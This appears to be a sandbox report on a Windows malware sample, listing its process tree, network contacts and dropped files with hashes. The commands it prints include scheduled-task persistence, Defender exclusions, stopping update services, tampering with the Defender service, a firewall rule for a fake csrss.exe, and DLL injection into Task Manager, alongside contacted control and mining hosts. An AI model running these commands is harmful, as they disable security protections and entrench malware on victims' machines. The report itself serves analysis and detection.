PID 4124 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4124 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4124 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3148 wrote to memory of 4412 N/A N/A C:\Windows\explorer.exe
PID 3148 wrote to memory of 4412 N/A N/A C:\Windows\explorer.exe
PID 3148 wrote to memory of 4412 N/A N/A C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe"

C:\Users\Admin\AppData\Local\Temp\5F80.exe

C:\Users\Admin\AppData\Local\Temp\5F80.exe

C:\Users\Admin\AppData\Local\Temp\62BD.exe

C:\Users\Admin\AppData\Local\Temp\62BD.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\661A.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\661A.dll

C:\Users\Admin\AppData\Local\Temp\69E4.exe

C:\Users\Admin\AppData\Local\Temp\69E4.exe

C:\Users\Admin\AppData\Local\Temp\67FF.exe

C:\Users\Admin\AppData\Local\Temp\67FF.exe

C:\Users\Admin\AppData\Local\Temp\5F80.exe

C:\Users\Admin\AppData\Local\Temp\5F80.exe

C:\Users\Admin\AppData\Local\Temp\759D.exe

C:\Users\Admin\AppData\Local\Temp\759D.exe

C:\Users\Admin\AppData\Local\Temp\7C46.exe

C:\Users\Admin\AppData\Local\Temp\7C46.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\dc7c59b8-8c2b-47e1-90e4-3d05406bc4c2" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 408 -ip 408

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 344

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\9349.exe

C:\Users\Admin\AppData\Local\Temp\9349.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\5F80.exe

"C:\Users\Admin\AppData\Local\Temp\5F80.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5F80.exe

"C:\Users\Admin\AppData\Local\Temp\5F80.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3020 -ip 3020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\9349.exe

"C:\Users\Admin\AppData\Local\Temp\9349.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\kyabiylzsfjo.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\kyabiylzsfjo.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 126.22.238.8.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 onualituyrs.org udp
US 8.8.8.8:53 sumagulituyo.org udp
US 8.8.8.8:53 snukerukeutit.org udp
US 104.198.2.251:80 snukerukeutit.org tcp
US 8.8.8.8:53 lightseinsteniki.org udp
SG 34.143.166.163:80 lightseinsteniki.org tcp
US 8.8.8.8:53 251.2.198.104.in-addr.arpa udp
US 8.8.8.8:53 liuliuoumumy.org udp
US 8.8.8.8:53 163.166.143.34.in-addr.arpa udp
US 8.8.8.8:53 254.1.248.8.in-addr.arpa udp
SG 34.143.166.163:80 liuliuoumumy.org tcp
US 8.8.8.8:53 stualialuyastrelia.net udp
RU 91.215.85.17:80 stualialuyastrelia.net tcp
US 8.8.8.8:53 17.85.215.91.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 18.192.137.79.in-addr.arpa udp
US 8.8.8.8:53 alayyadcare.com udp
PS 213.6.54.58:443 alayyadcare.com tcp
US 8.8.8.8:53 api.2ip.ua udp
US 188.114.96.0:443 api.2ip.ua tcp
US 8.8.8.8:53 58.54.6.213.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 montereyclub.org udp
US 172.67.196.133:443 montereyclub.org tcp
US 8.8.8.8:53 133.196.67.172.in-addr.arpa udp
US 8.8.8.8:53 loveperry.org udp
US 172.67.213.185:443 loveperry.org tcp
US 8.8.8.8:53 185.213.67.172.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
RU 91.215.85.17:80 stualialuyastrelia.net tcp
RU 85.209.11.85:41140 tcp
US 8.8.8.8:53 85.11.209.85.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 stalagmijesarl.com udp
US 95.214.26.31:80 stalagmijesarl.com tcp
BG 171.22.28.236:38306 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 236.28.22.171.in-addr.arpa udp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 d689a5dd-80fc-40c3-846f-57f13a833a9b.uuid.alldatadump.org udp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 server9.alldatadump.org udp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
BG 185.82.216.108:443 server9.alldatadump.org tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
IN 172.253.121.127:19302 stun1.l.google.com udp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.0:443 walkinglate.com tcp
US 8.8.8.8:53 127.121.253.172.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 server9.alldatadump.org udp
BG 185.82.216.108:443 server9.alldatadump.org tcp

Files

memory/4392-1-0x0000000000800000-0x0000000000900000-memory.dmp

memory/4392-2-0x00000000007E0000-0x00000000007EB000-memory.dmp

memory/4392-3-0x0000000000400000-0x00000000007CD000-memory.dmp

memory/3148-4-0x0000000002990000-0x00000000029A6000-memory.dmp

memory/4392-8-0x00000000007E0000-0x00000000007EB000-memory.dmp

memory/4392-5-0x0000000000400000-0x00000000007CD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\Local\Temp\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\Local\Temp\62BD.exe

MD5 73c0d14591b9438fd544c80ccee4fef1
SHA1 8eb8e501098dd00627bd7a63e0f01feb861eeac6
SHA256 ce66fdbd46087bff9a4114ed8b5268b1ba3aff912f3a9a9ce8374874092a8219
SHA512 d0c2a4baf90194865cb91cf825f16c9c546c18e1577331068a893cc09a42296b507fea01c4daad2a99d9a7e9e45453409fdb7e456b912517be4bc18c68bffc0f

C:\Users\Admin\AppData\Local\Temp\62BD.exe

MD5 73c0d14591b9438fd544c80ccee4fef1
SHA1 8eb8e501098dd00627bd7a63e0f01feb861eeac6
SHA256 ce66fdbd46087bff9a4114ed8b5268b1ba3aff912f3a9a9ce8374874092a8219
SHA512 d0c2a4baf90194865cb91cf825f16c9c546c18e1577331068a893cc09a42296b507fea01c4daad2a99d9a7e9e45453409fdb7e456b912517be4bc18c68bffc0f

memory/4508-23-0x00000000002A0000-0x00000000009DE000-memory.dmp

memory/4508-24-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-25-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-26-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-27-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-29-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-31-0x00000000773E4000-0x00000000773E6000-memory.dmp

memory/4508-33-0x0000000075230000-0x0000000075320000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\661A.dll

MD5 b22087ac0a2a7243e85d54a92654b666
SHA1 8e131975d080cf7ab254f8c9f52ec456ce6d03ad
SHA256 4cd083e241348bf34cc2fe65a443f49bb4ecbbece875f3b4739036a6ac3001c4
SHA512 70d9ea6624b432a3ad60d52f1096437509391c41c8db5ae0cc29050ad45b16d634d5485c65eb4d187eb8ced1958a7037e291650234e1be41489131dfe86a4dd1

memory/4508-36-0x0000000075230000-0x0000000075320000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\67FF.exe

MD5 276f4535df7de6a669a52a4e715f678c
SHA1 4ca1872fd68cf09060c344ecae344e5337d0f0fd
SHA256 e09d5baecda5561c71711ca31bf6b3a2c40d3e5d711c035f763a3456b7dd456f
SHA512 6316d85c668a9ac0eaf60047127237f8c95f54ea640318a80ed35a60ae899d2308dca6008f2ed71c23cf416e1a95486d5a265e2939a4b252f1e8f878f854dd89

C:\Users\Admin\AppData\Local\Temp\69E4.exe

MD5 5d2f4dced61a5ca942ddd8df3e2646d9
SHA1 87a53a110db93a85c2088424ff4d3feeb24ab82f
SHA256 911a05caef8cb0bbe510c0831c0f51dab5f5e9cc6bede193167bf13d630df618
SHA512 9770d4bab8ae0d0ae777c232e87f3a43375115faca33d1a8e3e459cd98e3987ddee73166a290c93a392ec007974505f965324463b4a24d9be0c051108b3e1bd6

C:\Users\Admin\AppData\Local\Temp\69E4.exe

MD5 5d2f4dced61a5ca942ddd8df3e2646d9
SHA1 87a53a110db93a85c2088424ff4d3feeb24ab82f
SHA256 911a05caef8cb0bbe510c0831c0f51dab5f5e9cc6bede193167bf13d630df618
SHA512 9770d4bab8ae0d0ae777c232e87f3a43375115faca33d1a8e3e459cd98e3987ddee73166a290c93a392ec007974505f965324463b4a24d9be0c051108b3e1bd6

memory/4508-30-0x0000000075230000-0x0000000075320000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\67FF.exe

MD5 276f4535df7de6a669a52a4e715f678c
SHA1 4ca1872fd68cf09060c344ecae344e5337d0f0fd
SHA256 e09d5baecda5561c71711ca31bf6b3a2c40d3e5d711c035f763a3456b7dd456f
SHA512 6316d85c668a9ac0eaf60047127237f8c95f54ea640318a80ed35a60ae899d2308dca6008f2ed71c23cf416e1a95486d5a265e2939a4b252f1e8f878f854dd89

C:\Users\Admin\AppData\Local\Temp\661A.dll

MD5 b22087ac0a2a7243e85d54a92654b666
SHA1 8e131975d080cf7ab254f8c9f52ec456ce6d03ad
SHA256 4cd083e241348bf34cc2fe65a443f49bb4ecbbece875f3b4739036a6ac3001c4
SHA512 70d9ea6624b432a3ad60d52f1096437509391c41c8db5ae0cc29050ad45b16d634d5485c65eb4d187eb8ced1958a7037e291650234e1be41489131dfe86a4dd1

memory/4528-47-0x0000000000770000-0x0000000000776000-memory.dmp

memory/4528-48-0x0000000010000000-0x00000000101D2000-memory.dmp

memory/4508-50-0x00000000002A0000-0x00000000009DE000-memory.dmp

memory/1392-52-0x00000000024E0000-0x0000000002575000-memory.dmp

memory/1392-54-0x0000000002580000-0x000000000269B000-memory.dmp

memory/4508-53-0x0000000005980000-0x0000000005F24000-memory.dmp

memory/4508-56-0x00000000053D0000-0x0000000005462000-memory.dmp

memory/4764-55-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4764-58-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5F80.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/4508-59-0x0000000005610000-0x00000000056AC000-memory.dmp

memory/4764-60-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4508-67-0x00000000002A0000-0x00000000009DE000-memory.dmp

memory/4764-68-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\759D.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\759D.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/4508-69-0x0000000005570000-0x000000000557A000-memory.dmp

memory/4508-76-0x0000000075230000-0x0000000075320000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7C46.exe

MD5 1ce0912c72e8d0bfa728e6a229b04330
SHA1 071804aecef07ef6e2a43cacc9dbacf64a8a2232
SHA256 b508ccb2b80bb777fae721ed1d4b515129e2381ec79044c5bc0e0a10a6060273
SHA512 209a84c8aa4ab135d3983151057b1aea732f3700f3c98fc854bc524d219edf7ba5ed0e4ae6dcb0cf92e3444085219a515ab2cc402e5537c16b22387d7648073e

memory/3168-81-0x00000000023D0000-0x00000000023D9000-memory.dmp

memory/3168-79-0x00000000007D0000-0x00000000008D0000-memory.dmp

memory/4508-83-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-84-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-85-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-86-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-88-0x0000000075230000-0x0000000075320000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/3168-82-0x0000000000400000-0x00000000007CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7C46.exe

MD5 1ce0912c72e8d0bfa728e6a229b04330
SHA1 071804aecef07ef6e2a43cacc9dbacf64a8a2232
SHA256 b508ccb2b80bb777fae721ed1d4b515129e2381ec79044c5bc0e0a10a6060273
SHA512 209a84c8aa4ab135d3983151057b1aea732f3700f3c98fc854bc524d219edf7ba5ed0e4ae6dcb0cf92e3444085219a515ab2cc402e5537c16b22387d7648073e

memory/4508-96-0x0000000075230000-0x0000000075320000-memory.dmp

memory/4508-97-0x0000000075230000-0x0000000075320000-memory.dmp

memory/408-102-0x0000000000970000-0x0000000000A70000-memory.dmp

memory/408-103-0x0000000000820000-0x000000000082B000-memory.dmp

memory/408-104-0x0000000000400000-0x00000000007CF000-memory.dmp

memory/3148-105-0x0000000002B90000-0x0000000002BA6000-memory.dmp

memory/3168-107-0x0000000000400000-0x00000000007CF000-memory.dmp

memory/4528-109-0x0000000010000000-0x00000000101D2000-memory.dmp

memory/4528-110-0x0000000000960000-0x0000000000A86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9349.exe

MD5 6c9efad2ba2589915879665a1a25a9ac
SHA1 8e94c81e51ad12f20c77da95883a4116a2c7a5c9
SHA256 55dc284e3cd4e026d83777e35f99d93037d20ffb6e2b3adb0f8ec95e8c232433
SHA512 61bb81a757cfb31ddacf7ae6e8b7627bf60a402e16a29dd6a1cd8aacc728529702dee3cf9758fdb6cb8a9e621e0cb8f213c793e913f6ba7a3df17c2db2a06a1c

